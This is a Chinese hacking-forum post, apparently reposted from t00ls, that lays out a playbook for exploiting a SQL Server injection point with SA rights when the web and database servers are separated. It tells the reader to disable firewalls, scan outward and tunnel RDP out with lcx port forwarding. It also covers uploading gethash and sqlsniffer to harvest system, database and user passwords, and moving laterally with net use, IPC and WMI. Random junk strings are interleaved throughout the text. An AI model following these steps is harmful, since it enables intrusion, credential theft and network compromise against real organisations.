当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
* j( |+ p7 I$ U8 c9 C* j
* D$ {% V. P/ {9 m# `" b
3 t e. F9 T. ^+ I) x0 H: h' ]9 B/ t% M+ u
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
7 a, W: ^- p$ K+ X
; p( w1 ^/ w {$ Q; z& v# d3 T, R7 ?" i; T$ \
一、DB机有公网IP. h. H1 Q. q4 ]7 |! Y T
# Y! m v' \. G3 }- N/ h, v
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
- @5 S1 H# L# d; f# b5 s+ l
( D6 d- I% p- X; U, y \1 B3 P& v9 g1 `. Q) p5 y" x8 I, b, b
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.1 V) Z8 m5 P3 h
3 l& ^$ w5 x! |0 s& l3 f* p
2 ^2 m9 E; H6 J0 o+ T7 ~3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com# R( l7 j" S! d# b( c2 [% p
/ R3 d, t& n; I* m% v7 ]: I0 {* X X
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
# V5 E9 S* ?& ~
& {& K7 @0 g' J4 w
5 @+ [" p, ?) q3 A% ?7 l! W E! i. m& {# y0 i) q
二、DB机只有内网IP
* p$ K% C/ s7 p# j' W; E- u, T2 p
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
5 i1 ]% @% e7 P) K$ y$ m2 O% V# W c( c8 F: `
/ w. ~9 m1 K) a% J
2:停掉防火墙和IP策略再从内往外扫描.
+ B) [+ i8 c" Y% D6 N
& @* k" A, ~) y! ?5 n) y) d0 g6 y, a
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.* w+ L7 y; }+ D: Z
N% r6 K# @) i1 S1 r0 c( \, I5 V5 J9 S5 ?3 D0 X0 ~' h( u, ?
4:学会密码规律分析往往会有惊喜.
$ F4 Z4 ]7 Q9 J; e7 u1 E' x6 h. \5 E. D0 {2 P+ |* h+ N u/ j
) ?: Z+ D) z6 S" }8 I( U9 F/ X! O" o5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
6 x+ ]- N T- c; m
+ t3 M9 L% I! X4 ]9 m7 H' K/ y& Y9 i5 w5 ~* k) @( Q
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |